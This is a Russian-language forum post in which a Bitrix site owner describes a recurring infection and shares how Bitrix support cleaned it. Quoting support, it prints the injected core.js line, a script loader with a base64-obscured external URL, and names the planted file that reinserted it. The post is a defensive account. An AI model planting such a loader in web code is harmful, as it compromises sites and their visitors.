Первая ссылка перестала появляться, а вот вторая в /bitrix/js/main/core/core.js с завидной регулярностью, раз в неделю удаляю. Ядро пока не обновляла, только лицензию продлила...
Команда битрикс говорит, нужно обновить сайт до последней версии. У меня не было обновления 3 года, поскольку кто делал сайт, говорит, что все разъедется и может много чего начать работать не корректно. Пока обновлять не решилась, но видно придется задуматься об этом.
Добрый день. Я нашла эти две ссылки и удалили их вручную, через 2-3 недели, ссылки опять появились - удалила. А вчера, открываю сайт, в админку попасть не могу, куда не жму, все не кликабельно. На сайте так же, товар есть, его видно, но переключения между вкладками нет, картинки тоже не кликабельны, товар в корзину не кладется. Обратилась в поддержку битрикс. Может кому-то поможет, специалист мне удалил эти две ссылки (всем уже известные). Ниже как решалась проблема, может кому-то пригодится.
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src=" (?) ript>;
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz`);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк.
А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php. Из-за которого возникла вся эта ситуация.19:20 То есть из-за этого файла в /bitrix/js/main/core/core.js и в /bitrix/modules/main/include/prolog.php добавились лишние строки.
